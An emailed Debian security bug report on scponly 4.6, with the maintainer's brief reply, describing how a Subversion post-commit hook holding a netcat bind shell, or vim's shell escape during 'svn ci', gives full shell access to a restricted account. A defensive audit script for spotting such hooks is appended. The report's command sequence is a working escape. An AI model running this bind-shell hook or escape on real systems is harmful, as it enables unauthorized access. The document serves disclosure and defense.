Hi Joachim,
On 10.08.2007, at 19:54, Joachim Breitner wrote:
Package: scponly
Version: 4.6-1
X-Debbugs-CC: [EMAIL PROTECTED]
Severity: grave
Tags: security
Hi Thomas Wana,
messing around with some friends here, I tried to access his computer
with only a scponly protected account. I discovered this way of gaining
full shell access:
Nice and creative way :-)
Can you please get in touch with the scponly-mailinglist,
this should be discussed there and fixed upstream.
Tom
I locally created a subversion repository /tmp/blubb with
a /tmp/blubb/hooks/post-commit that contains the command:
( nc -l -p 1042 -e /bin/bash) &
I copy this repository using
scp -r /tmp/blubb/ [EMAIL PROTECTED]:
Then I check out the repository remotely:
ssh [EMAIL PROTECTED] /usr/bin/svn co file:///home/user/blubb bla
Now I add a file and commit it:
touch blah
scp blah [EMAIL PROTECTED]:bla/
ssh [EMAIL PROTECTED] /usr/bin/svn ci bla
At this point, I have a vim instance running, asking me for the commit
message. I could now just run
:!/bin/bash
to get a shell, but having done the post-commit hook already, I want to
use that, so I write something and quit the editor with :x
At this point, I can use
nc host 1042
and I have a shell for the account that should have none.
The solution would be: Do not enable access to svn
(or svnserve), which is a simple compilation option. I’d appreciate it
if this gets fixed in debian etch.
I have sent this information to [EMAIL PROTECTED] and scponly’s
upstream maintainer last week, but have not yet gotten a response.
Greetings,
Joachim
--
Joachim "nomeata" Breitner
Debian Developer
[EMAIL PROTECTED] | ICQ# 74513189 | GPG-Keyid: 4743206C
JID: [EMAIL PROTECTED] | http://people.debian.org/~nomeata
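
An added audit sketch, not part of this thread or of scponly itself: it lists executable Subversion hook scripts sitting in the home directories of accounts whose login shell is scponly, the condition the report above relies on. The function names, the optional root prefix and the fixture tree are assumptions made for illustration; chroot-style home paths are not handled.

```shell
#!/bin/sh
# Added example, not from the original report. Flags active Subversion hooks
# in home directories of scponly-restricted accounts.

# audit_scponly_hooks PASSWD_FILE [ROOT_PREFIX]
# Prints "user<TAB>hook-path" for every hook that svn would execute.
audit_scponly_hooks() {
    passwd_file=$1
    prefix=${2:-}
    # Field 7 is the login shell; match scponly and the scponlyc variant.
    awk -F: '$7 ~ /\/scponlyc?$/ { print $1 ":" $6 }' "$passwd_file" |
    while IFS=: read -r user home; do
        [ -d "$prefix$home" ] || continue
        # A repository root holds a hooks/ directory next to a "format" file.
        find "$prefix$home" -type d -name hooks 2>/dev/null |
        while IFS= read -r hooks; do
            [ -f "$(dirname "$hooks")/format" ] || continue
            for h in "$hooks"/*; do
                [ -f "$h" ] || continue
                # Files ending in .tmpl are inert templates.
                case $h in *.tmpl) continue ;; esac
                # svn only runs hook files that are executable.
                if [ -x "$h" ]; then printf '%s\t%s\n' "$user" "$h"; fi
            done
        done
    done
}

# Build a constructed sample tree (not real data) under $1 for a dry run.
make_fixture() {
    root=$1
    mkdir -p "$root/home/user/blubb/hooks" "$root/home/admin/repo/hooks"
    printf '%s\n' 'user:x:1001:1001::/home/user:/usr/bin/scponly' \
        'admin:x:1000:1000::/home/admin:/bin/bash' > "$root/passwd"
    : > "$root/home/user/blubb/format"
    : > "$root/home/admin/repo/format"
    printf '#!/bin/sh\n' > "$root/home/user/blubb/hooks/post-commit"
    printf '#!/bin/sh\n' > "$root/home/user/blubb/hooks/pre-commit.tmpl"
    printf '#!/bin/sh\n' > "$root/home/admin/repo/hooks/post-commit"
    chmod +x "$root"/home/*/*/hooks/*
}
```

On a real host, `audit_scponly_hooks /etc/passwd` run as root covers every restricted account; any line of output is a hook that a permitted `svn ci` would execute as that user.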